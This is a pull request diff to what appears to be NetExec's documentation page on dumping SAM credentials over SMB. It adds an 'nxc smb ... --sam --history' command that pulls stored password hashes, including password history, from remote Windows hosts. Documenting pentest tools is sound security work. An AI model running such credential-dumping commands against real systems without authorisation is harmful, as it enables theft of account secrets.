Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions smb-protocol/obtaining-credentials/dump-sam.md
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,11 @@ You need at least local admin privilege on the remote target, use option **--loc
nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
```

### Dump SAM including password history
```bash
nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam --history
```

If this command fail you can also try the old method (similar to secretdump)

```bash
Expand Down